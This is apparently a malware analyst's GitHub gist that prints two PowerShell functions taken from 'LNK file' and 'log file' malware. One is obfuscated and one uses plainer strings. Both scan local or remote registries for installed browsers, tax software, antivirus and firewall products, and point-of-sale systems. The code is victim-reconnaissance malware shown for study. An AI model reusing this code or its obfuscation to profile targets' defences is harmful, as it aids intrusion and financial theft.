Skip to content

Instantly share code, notes, and snippets.

@jdferrell3
Created June 5, 2020 00:43
Show Gist options
  • Save jdferrell3/81fd76d5a8abd870e1294309bec88709 to your computer and use it in GitHub Desktop.
Save jdferrell3/81fd76d5a8abd870e1294309bec88709 to your computer and use it in GitHub Desktop.
# From "LNK file" malware
function Get-Soft {
param (
[Parameter(ValueFromPipeline=$true)]
[string[]]$ComputerName = $env:COMPUTERNAME,
[string]$NameRegex = ((("{13}{5}{7}{30}{16}{4}{18}{10}{8}{26}{11}{21}{24}{6}{23}{2}{3}{19}{20}{1}{14}{29}{0}{12}{28}{15}{22}{27}{25}{17}{9}"-f'do','ntiX','RgSec','ury','LACERTEXRgPROSERIES','RgFire','nde','foxXRgChr','XR','OS)','us','ire','XRgKasperXRgProtec','(OperaX','Rg',' of ','XRgTAXXRgOLTXRg','gP','XRgVir','X','RgA','wallXRg','Sale','rX','Defe','R','gF','X','tXRgPoint','Como','ome')).REpLace(([ChAR]88+[ChAR]82+[ChAR]103),[StRING][ChAR]124))
)
foreach ($comp in $ComputerName) {
$keys = '',((("{2}{3}{4}{1}{0}" -f 'Node','32','{0','}','Wow64')) -f [CHAr]92)
foreach ($key in $keys) {
try {
$apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(("{0}{1}{2}" -f 'LocalMa','c','hine'),$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
} catch {
continue
}
foreach ($app in $apps) {
$program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(("{1}{0}{2}" -f'alMac','Loc','hine'),$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app")
$name = $program.GetValue(("{0}{2}{1}" -f'Displ','ame','ayN'))
$str = ''
if ($name -and $name -match $NameRegex) {
$str += $name + ';'
$str
}
}
}
}
}
# From "log file" malware
function gic-jadkdp {
param (
[Parameter(ValueFromPipeline=$true)]
[string[]]$ComputerName = $env:COMPUTERNAME,
[string]$NameRegex = '(Opera|Firefox|Chrome|TAX|OLT|LACERTE|PROSERIES|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|Protect|Point of Sale|POS)'
)
foreach ($comp in $ComputerName) {
$gibqokxyxbupwcsrtuvm_41nhwrps = '','\Wow6432Node'
foreach ($gibqokxyxbupwcsrtuvm_41nhwrp in $gibqokxyxbupwcsrtuvm_41nhwrps) {
try {
$apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$gibqokxyxbupwcsrtuvm_41nhwrp\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
} catch {
continue
}
foreach ($app in $apps) {
$program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$gibqokxyxbupwcsrtuvm_41nhwrp\Microsoft\Windows\CurrentVersion\Uninstall\$app")
$name = $program.GetValue('DisplayName')
$str = ''
if ($name -and $name -match $NameRegex) {
$str += $name + ';'
$str
}
}
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment